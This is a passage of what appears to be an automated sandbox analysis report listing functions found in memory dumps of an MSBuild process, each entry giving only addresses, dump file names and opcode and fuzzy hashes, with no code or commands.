                        • Opcode ID: c2d0f9b425335a86cc5ded9a41068ee9a475b6d134bf5ca9ee5f45f19902cb12
                        • Instruction ID: 2a093ed9df539a5d988204f96b296e27b5d7c98dbd584911086995dfe8635ea3
                        • Opcode Fuzzy Hash: c2d0f9b425335a86cc5ded9a41068ee9a475b6d134bf5ca9ee5f45f19902cb12
                        • Instruction Fuzzy Hash: 4F2159303102018FCB54DB7CD880A1ABBE2AFDD30431585A9E18ACF36ADB34EC068B50
                        Function 0676DCD0 Relevance: .1, Instructions: 71COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8a334ce47fd34af7cefaee130007bbf71b56727428bd5ea15e7e3dfd0abf358
                        • Instruction ID: 34ba96d72ee8f95bfa404f4f6cac974719532a454e84aed37ff25c72181acfaf
                        • Opcode Fuzzy Hash: a8a334ce47fd34af7cefaee130007bbf71b56727428bd5ea15e7e3dfd0abf358
                        • Instruction Fuzzy Hash: E52163357000149FC754EF2AE888D6EBBEAFF89615725816AF509CB361CB31EC01CB60
                        Function 066FE521 Relevance: .1, Instructions: 71COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b0fe6ec8f05430d5dff2f0d5b80482f556499dca9b81758da6971ccea256e60f
                        • Instruction ID: 6febb079799964ecc14acfe7d1db31e5974eb76224307e97ed1647741edb790a
                        • Opcode Fuzzy Hash: b0fe6ec8f05430d5dff2f0d5b80482f556499dca9b81758da6971ccea256e60f
                        • Instruction Fuzzy Hash: 6211D8312103009FC754DB69D941B9ABBA6EFC0310F508939E5158B365EE76ED89CBA0
                        Function 0673F570 Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3da39099bc317a0bf67514364348232adcc3e87c63931ea064ef7a73640e7cff
                        • Instruction ID: cda3a7429e75ddc7c74c177ace2ca6372680c0e6e19a937ee873d04ef4f1a277
                        • Opcode Fuzzy Hash: 3da39099bc317a0bf67514364348232adcc3e87c63931ea064ef7a73640e7cff
                        • Instruction Fuzzy Hash: 11219D34B007118FC7A49F38D8A962A7BE6FF88245714893AE56BC3751EF35EC028B50
                        Function 06763667 Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 86d6a48b24649db2dba7487b735b7e63b90043094bb2f4cbc3310c9191716321
                        • Instruction ID: 713497d7283169d9a0fe5029978c7354476677b181df5543922e704f3c0ee8d2
                        • Opcode Fuzzy Hash: 86d6a48b24649db2dba7487b735b7e63b90043094bb2f4cbc3310c9191716321
                        • Instruction Fuzzy Hash: D5212771E10208CFCB58DFAAD5956EDBBF1AF8C321F14916AE801B7360EB319945CB60
                        Function 06730DFB Relevance: .1, Instructions: 68COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2dbe4d7ed67788188f1743d7ea845ef891f43c619021361f4daea23f8407539
                        • Instruction ID: a506e2cc8e10fa9613418271a8a1d8a6de50f9eb5317c1eda27dbff32a93b736
                        • Opcode Fuzzy Hash: d2dbe4d7ed67788188f1743d7ea845ef891f43c619021361f4daea23f8407539
                        • Instruction Fuzzy Hash: 80216F7190525AAFCB11DFB8D8449EFBFB9FF89210B10056AE549E7202D7319A06CBA1
                        Function 0676BC20 Relevance: .1, Instructions: 68COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d8d62448e4d554ecac8e573921db268af11cc11d9c03548544b47a7e1659d67
                        • Instruction ID: d916a23d8a4ac23310feededb86aa146a37613cc9701e0729cc2c36701bba6d3
                        • Opcode Fuzzy Hash: 3d8d62448e4d554ecac8e573921db268af11cc11d9c03548544b47a7e1659d67
                        • Instruction Fuzzy Hash: AB21F930A203199FD7049B76D448BAEBBB5FF8A301F108629F545A7350EF71A984CB51
                        Function 06739206 Relevance: .1, Instructions: 66COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c9775a9afcd85f5921a0603ff68b6c55424e80901fa14e115ca01f6611b97e3
                        • Instruction ID: fb3098a4119a6cf0c378c60c6585ba04dc810f8f32d20d4537bb2bce67c0b3a3
                        • Opcode Fuzzy Hash: 4c9775a9afcd85f5921a0603ff68b6c55424e80901fa14e115ca01f6611b97e3
                        • Instruction Fuzzy Hash: 93219871B10214CFDB14DBA8D844AADBBB6EF88314F244169E605E73A5DB719C46CB50
                        Function 010195E8 Relevance: .1, Instructions: 65COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff1c0794d08603d7e90828d976014e421ff62d327022deb1b37cac80ac45266a
                        • Instruction ID: d84d7ee98421449202f694e6293d257a995e83f65341c0579f769e61ccaa07be
                        • Opcode Fuzzy Hash: ff1c0794d08603d7e90828d976014e421ff62d327022deb1b37cac80ac45266a
                        • Instruction Fuzzy Hash: 5F1136301053408FC342BB38E9656AE7FB2EFC2314305887EE4468B666DD34AE4ED3A5
                        Function 0673F478 Relevance: .1, Instructions: 65COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 26a0e02ee9ca537cd253ebff8485db7ce9b85d2826f1f9d1e691ac61d3934ce2
                        • Instruction ID: d06ab3a7b4f23d11a74334b0affc1fadc877f7b9b4fba7d43b3ce48361358b0c
                        • Opcode Fuzzy Hash: 26a0e02ee9ca537cd253ebff8485db7ce9b85d2826f1f9d1e691ac61d3934ce2
                        • Instruction Fuzzy Hash: 7011A231A007149FC320CF2AC944957BBE6EFC5354B14897AE54AC7662DB31FC46CB90
                        Function 06739744 Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e26aa49eb7bfa2826704b9f462ef2c3e5f8acee76edb58cfa82d7f5e31a20c5d
                        • Instruction ID: ab3b5aa804b0f8a5a8fb38aebd2ddbebfd7c095c8ae751ac4797537638680cb3
                        • Opcode Fuzzy Hash: e26aa49eb7bfa2826704b9f462ef2c3e5f8acee76edb58cfa82d7f5e31a20c5d
                        • Instruction Fuzzy Hash: F7216974E05229DFCB14DFA9E5406ADBBB2FF88314F208429E50AA7345DB70A942CF50
                        Function 0673BE2F Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8ba0fb8d985d3f0b6203be1fc6206a41f5c11ec8abece50e15a6d040b15f2d2a
                        • Instruction ID: c91455c0d10dad331e72e8f6d86e52dc131e46d98d175a21ee27a16e557d0e77
                        • Opcode Fuzzy Hash: 8ba0fb8d985d3f0b6203be1fc6206a41f5c11ec8abece50e15a6d040b15f2d2a
                        • Instruction Fuzzy Hash: 9E21C635E043688FDF14CBA9C5406EEFFF6AF89710F1880A9E541B7281D7759984CBA0
                        Function 06736D4F Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 754b37fe256d77e5a34579c88cbc9ab4a2a97c533fb96bd966cff10249f38ff1
                        • Instruction ID: 0a29ac6ec757510998d56f1703d9bb16c53019bbe620cbca4e50c3cb68d6d688
                        • Opcode Fuzzy Hash: 754b37fe256d77e5a34579c88cbc9ab4a2a97c533fb96bd966cff10249f38ff1
                        • Instruction Fuzzy Hash: D8219332A1061D9FCF01EF68D8448DDBBB6FF89314F00456AD5017B220EF705949CB91
                        Function 067372B8 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 527f20a7f79c640badeeddacd9b9123ecc3c9797a52f2a1400c27d8b36f75fb8
                        • Instruction ID: 24617acfe985b2aa1ab5328906849f14d738d02dc176d6e3a345c33d559239f5
                        • Opcode Fuzzy Hash: 527f20a7f79c640badeeddacd9b9123ecc3c9797a52f2a1400c27d8b36f75fb8
                        • Instruction Fuzzy Hash: B92149B0E002698FCB08CBE9C944AEDBBF5AF48300F148069D805EB359DB719D44CB54
                        Function 0676CD68 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5efce1fdb1554b2418f3e8109f789df15ebb4e064f88db5d9343a7e09d155d4e
                        • Instruction ID: 825abed411028e4837a7b377b4e22966f2eb34ba42d4686f2042e00e17fdfac6
                        • Opcode Fuzzy Hash: 5efce1fdb1554b2418f3e8109f789df15ebb4e064f88db5d9343a7e09d155d4e
                        • Instruction Fuzzy Hash: DE119431740110AFDB568E1AD888A7A7FA9FF86610B198096FD49CB3A6C731DC41CBB0
                        Function 01018780 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b7a438e45df5e31e49cbd3c919ecdadf6685948223c5c7ea17ff5a3eeb47fdf
                        • Instruction ID: 02e184ad5e865bde8c092b933abb4e3b0ad0648f6d87be7dfe52e77a27cdc27f
                        • Opcode Fuzzy Hash: 1b7a438e45df5e31e49cbd3c919ecdadf6685948223c5c7ea17ff5a3eeb47fdf
                        • Instruction Fuzzy Hash: D21159312043049FC7106B6AF80679A7FE9EF81354F00897EE449C7646DF799944C7A1
                        Function 0673C418 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 418a57b19eaddfa259682f9accf08f679c207b739d517028c8d6a35a86afb487
                        • Instruction ID: e1069299823d72d38ee1e5fcf165927da54d46f89977566d981259cd3f65e3c5
                        • Opcode Fuzzy Hash: 418a57b19eaddfa259682f9accf08f679c207b739d517028c8d6a35a86afb487
                        • Instruction Fuzzy Hash: AD11E231A102189FCB01AFB8D818AEE7B76EF89700F008129F906B7240EF319956CBD0
                        Function 06736400 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aeea22691793a7533661ab62c16e9491aef1e78ab1cd0e23bc1e66408a76e14f
                        • Instruction ID: 68152d6d5d9e66be3f882f6cc372b7a78d145d8774616b71343a1d57f37b23a7
                        • Opcode Fuzzy Hash: aeea22691793a7533661ab62c16e9491aef1e78ab1cd0e23bc1e66408a76e14f
                        • Instruction Fuzzy Hash: B321C230E00754AFDB529F74D82C3AEBFB2BF41305F00455DDA8687692DB786648CB91
                        Function 066F94B0 Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fa7a441c20372345e750996002e4fd1087ada4bc785f4e9a34414b965722ecc
                        • Instruction ID: 775940f088f3a860a65d187178d4d62be5298b0979029d380dc6ae4efcdfd891
                        • Opcode Fuzzy Hash: 2fa7a441c20372345e750996002e4fd1087ada4bc785f4e9a34414b965722ecc
                        • Instruction Fuzzy Hash: 1D116D70B142059FCB44EFBCE844A99BFF1EF89310B0085A9E549CB366DB34D905CB91
                        Function 06736410 Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c96e68489bff4085f47e96aa320bc82953355ba1652765b7d4bb7d18cd2a1d0
                        • Instruction ID: 14e037d3bae69d8ffd0abafa3549737f9084361e8d45f30745b696c00062fb76
                        • Opcode Fuzzy Hash: 1c96e68489bff4085f47e96aa320bc82953355ba1652765b7d4bb7d18cd2a1d0
                        • Instruction Fuzzy Hash: 0D219D30E00764AFDB66AF64D51C3AEBFF2BF45305F00451DDA8296691DB786A48CB81
                        Function 067383CF Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 343880472a2eedd0001f942621b78bec57d9405fcbfdbadfa349e0844e942cd0
                        • Instruction ID: 71527984da340bd3d347b9386c716cef3355870da10a0138102d0e1c35874a72
                        • Opcode Fuzzy Hash: 343880472a2eedd0001f942621b78bec57d9405fcbfdbadfa349e0844e942cd0
                        • Instruction Fuzzy Hash: B611E1312102109FC761DB7DE8408AEFBE6EFC5214715892AE045CF33ADB38DD4A87A6
                        Function 00F2D6A3 Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680000449.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_f2d000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                        • Instruction ID: 29668a52b84c6cb8e39990281f15e4b431fd949a9f2161892b6a1756e6f08a2b
                        • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                        • Instruction Fuzzy Hash: EA218C76904284DFCF06CF10D9C4B16BF62FB98324F2486A9DD494B256C33AD866DB92
                        Function 0676C6E5 Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1360bce880dd879eedf70b810f6831d0cb66612e61b0658232618db80c09fe34
                        • Instruction ID: 2bfa59bf81cc30108b90211dd1aaddf1c191323b0470df914926b700c2bb7752
                        • Opcode Fuzzy Hash: 1360bce880dd879eedf70b810f6831d0cb66612e61b0658232618db80c09fe34
                        • Instruction Fuzzy Hash: 50112C35E192A45FCB43AF7E99140EE7FB09F89220B0840EBD986DB153D3645505CBC1
                        Function 0101669F Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 57f33e7d9d2e88f4969b7d2ebe1690625711ca878b3fcf998cd9c26577b42ff6
                        • Instruction ID: bbd0e40b087bd988e861d0e02b51bd8e03d366841b56d4b6ac0a4944e2b2bd74
                        • Opcode Fuzzy Hash: 57f33e7d9d2e88f4969b7d2ebe1690625711ca878b3fcf998cd9c26577b42ff6
                        • Instruction Fuzzy Hash: E611E374E002149FCF149F3899046BE7AE2BBC4320F1882AAD8549B395EE758D858B81
                        Function 0101AF7F Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7cf200d4f2024c9567815bd780fba9b105c9d31e79973225f5bcc053c2979219
                        • Instruction ID: 9e8b44664d7174228d31cc6a958d5074a3440d765092a7e9c151b7d8aa815336
                        • Opcode Fuzzy Hash: 7cf200d4f2024c9567815bd780fba9b105c9d31e79973225f5bcc053c2979219
                        • Instruction Fuzzy Hash: 00112971300611AFD705BAA6BC42AADB796FB91700F804938E0098FBA8CF759D4A47D6
                        Function 06736D60 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 05d0455931ace57a806da3fc18e98f88797847e51c1ab04a0e342bec7ac47a90
                        • Instruction ID: 9948489198410536aaa8175b54d2d1a8f3b69afa5e9c98ecdee0a9800ed4980e
                        • Opcode Fuzzy Hash: 05d0455931ace57a806da3fc18e98f88797847e51c1ab04a0e342bec7ac47a90
                        • Instruction Fuzzy Hash: DA115132A1051D9FCF05EF68D8548DDBBB6FF89310F00466AD5057B224EF70A949CB91
                        Function 010166B0 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 565bb27d0e7123421d5c71acb2117c2c59ad081eb27c16fb35c1868c4ca08d96
                        • Instruction ID: 907547f846f9d9fd2b218d6a73307e297762b823e207e189622e5a6602e36ad5
                        • Opcode Fuzzy Hash: 565bb27d0e7123421d5c71acb2117c2c59ad081eb27c16fb35c1868c4ca08d96
                        • Instruction Fuzzy Hash: 95110874F002249FCB04AB78990467E7AE3FFC4720F1885AADC549B399EF759D818781
                        Function 0673F648 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3672f8ddce7e84ed82ba10a67132217b75a67fbbda94b9c12ad965f32df5a83e
                        • Instruction ID: fd69282f2e16057cfc5316d839951b11cfb89a0f64d066289f3443bd3989d2e8
                        • Opcode Fuzzy Hash: 3672f8ddce7e84ed82ba10a67132217b75a67fbbda94b9c12ad965f32df5a83e
                        • Instruction Fuzzy Hash: 70014032B0A350DFC7514B29DC444767B65EBC225531A44EBD149CB063E335EC46C751
                        Function 0673DEBF Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3168d3b31b6221a55745c4c230512a6eeff7692b19c9396aad3c7d97b6ef88fc
                        • Instruction ID: a6370e74645d45033ea1c9f5a2142223e3b59ec820135fa3d416ca4889855692
                        • Opcode Fuzzy Hash: 3168d3b31b6221a55745c4c230512a6eeff7692b19c9396aad3c7d97b6ef88fc
                        • Instruction Fuzzy Hash: C311C435B001218FC764DA2CD8D89AA7BAAEFD52507148156E505CB336DB31DC45CB51
                        Function 00F2D457 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680000449.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_f2d000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction ID: 0fc7d5c3dcd67c0bad118d4d9dc46f25d95be943d77e25b82c257cab25a67c22
                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction Fuzzy Hash: BD11E976904240DFDB16CF10E5C4B16BF72FB94324F28C5A9DC050B256C33AD45ADBA1
                        Function 00F2D543 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680000449.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_f2d000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction ID: d148aeaa5d4c1548b83a53d50afcb019bfed3d4328cb49f11f7598f90762d2bd
                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                        • Instruction Fuzzy Hash: 1511E676904280CFCB16CF14E5C4B16BF71FB94324F28C5A9DC094B656C336D85ADBA2
                        Function 06730E10 Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 473ea25e659fa184d87481b22e918df09df7dc1cfb27790a69f3377b0cec8e68
                        • Instruction ID: 6bedde001a1c992256582ebd18b2af64c58e367d9657671fc1e07040b8d063fa
                        • Opcode Fuzzy Hash: 473ea25e659fa184d87481b22e918df09df7dc1cfb27790a69f3377b0cec8e68
                        • Instruction Fuzzy Hash: 01113071E002199FCB10DFA9C8449EFBFB9FF89210B10412AE619E3301D7319946CBA0
                        Function 0676CC30 Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 303d17efbf5e94ea3cd2ce5abcb27614ed8795610c4b690c7805629aaca43202
                        • Instruction ID: 1aab51f4923f4a0d388cc7506307aad7ddcb6971642d7672da5ff763b36c125d
                        • Opcode Fuzzy Hash: 303d17efbf5e94ea3cd2ce5abcb27614ed8795610c4b690c7805629aaca43202
                        • Instruction Fuzzy Hash: CE11E931D042148FDF668BAAD9146FA7FF7AF8D300F044619E586E7351CB365805DBA0
                        Function 0673E619 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9195ed1f241912d5787fb99952c3293c27975a1229a2484ed162c1e10cafbda9
                        • Instruction ID: 506203e4f36387ab464d942211e2a7aeaf3058746a41ab0031bd8625a9977c6b
                        • Opcode Fuzzy Hash: 9195ed1f241912d5787fb99952c3293c27975a1229a2484ed162c1e10cafbda9
                        • Instruction Fuzzy Hash: 67113C75A106089FCB10DFB8D848CAEBFF9FF89210B11416AE945E7321DB70AD44CBA1
                        Function 06762900 Relevance: .1, Instructions: 52COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cc4af94e740d9e86b0e8a3156f45af4aa221912f553bbb355ee3ed1b809e1d2
                        • Instruction ID: e93d2476b1f8b8fb0aee01593e680ca586a7c4264abed7b68b6ba13f7f8a58de
                        • Opcode Fuzzy Hash: 1cc4af94e740d9e86b0e8a3156f45af4aa221912f553bbb355ee3ed1b809e1d2
                        • Instruction Fuzzy Hash: BFF0F4329593806FC7E64A27C808D65BFAAAFD2204B498596F864AA073C6208E08C365
